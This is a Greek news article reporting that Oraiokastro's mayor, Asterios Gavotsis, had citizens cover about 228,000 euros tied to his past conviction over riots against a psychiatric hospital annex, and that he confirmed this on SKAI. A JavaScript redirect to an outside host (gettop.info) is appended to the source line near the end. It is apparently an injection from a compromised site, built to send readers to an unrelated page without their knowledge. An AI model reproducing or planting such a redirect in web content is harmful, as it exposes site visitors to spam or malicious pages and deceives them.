«Αυγή» για δήμαρχο Ωραιοκάστρου: Οι δημότες πλήρωσαν τα «σπασμένα» του (BINTEO)

0
6

 

Με 228.000 ευρώ φέρεται να χρέωσε τους πολίτες του Ωραιοκάστρου ο δήμαρχος Αστέριος Γαβότσης, σύμφωνα με δημοσίευμα της εφημερίδας Αυγή. Όπως αναφέρεται στο δημοσίευμα, οι δημότες φέρεται «να έχουν πληρώσει τα σπασμένα από παλιότερους τραμπουκισμούς και καταστροφές για τις οποίες είχε καταδικαστεί ο δήμαρχος Αστέριος Γαβότσης».

Σύμφωνα με το δημοσίευμα, ο «γαλάζιος» δήμαρχος είχε επιδοθεί στο κυνήγι των ψυχικά πασχόντων, έχοντας πρωταγωνιστήσει σε επεισόδια πριν από πολλά χρόνια για τη ματαίωση της δημιουργίας παραρτήματος του Ψυχιατρικού Νοσοκομείου Θεσσαλονίκης στα όρια του δήμου του.

Ο Αστέριος Γαβότσης, που καταδικάστηκε ως ηθικός αυτουργός, κατάφερε -σύμφωνα πάντα με το δημοσίευμα- να περάσει στον προϋπολογισμό του δήμου τα «σπασμένα».

Μιλώντας στον ΣKΑΪ, ο κ. Γαβότσης παραδέχθηκε την υπόθεση, ξεκαθάρισε όμως ότι είχε καταδικαστεί ως δήμαρχος και πως υπήρξε και απόφαση του δημοτικού συμβουλίου.

Ο δήμαρχος Ωραιοκάστρου Αστέριος Γαβότσης, επιβεβαίωσε το ρεπορτάζ της ΑΥΓΗΣ το πρωί στο ΣΚΑΙ λέγοντας «σαφέστατα ισχύει» και κάτω από το βάρος της καταδικαστικής απόφασης εις βάρος του που πλήρωσαν οι δημότες Ωραιοκάστρου προσπάθησε να κρατήσει αποστάσεις από τη ΝΔ.

Πηγή: politesoraiokastrou.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here